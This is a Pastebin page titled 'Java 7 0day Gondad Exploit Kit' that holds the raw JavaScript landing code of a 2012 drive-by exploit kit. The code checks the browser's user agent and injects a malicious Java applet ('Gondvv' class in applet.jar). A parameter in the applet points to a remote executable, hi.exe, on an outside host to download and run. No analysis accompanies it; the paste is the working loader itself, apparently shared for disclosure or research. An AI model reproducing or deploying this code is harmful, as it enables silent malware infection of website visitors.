Advertisement
eromang

Java 7 0day Gondad Exploit Kit

Aug 27th, 2012
1,977
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. var xxx3 = window.navigator.userAgent.toLowerCase();
  2.     if (xxx3.indexOf("msie 6") > -1) {
  3.         document.write("<OBJECT classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' width='200' height='200'><param name=xiaomaolv value= 'http://ok.aa24.net/meeting/hi.exe'><param name=bn value= 'woyouyizhixiaomaolv'><param name=si value= 'conglaiyebuqi'><param name=bs value= '748'><param name=CODE value= 'cve2012xxxx.Gondvv.class'><param name=archive value= 'applet.jar'></OBJECT>");
  4.     } else {
  5.         document.write("<br>");
  6.         var gondady = document.createElement("body");
  7.         document.body.appendChild(gondady);
  8.         var gondad = document.createElement("applet");
  9.         gondad.width = "256";
  10.         gondad.height = "256";
  11.         gondad.archive = "applet.jar";
  12.         gondad.code = "cve2012xxxx.Gondvv.class";
  13.         gondad.setAttribute("xiaomaolv", "http://ok.aa24.net/meeting/hi.exe");
  14.         gondad.setAttribute("bn", "woyouyizhixiaomaolv");
  15.         gondad.setAttribute("si", "conglaiyebuqi");
  16.         gondad.setAttribute("bs", "748");
  17.         document.body.appendChild(gondad);
  18.     }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement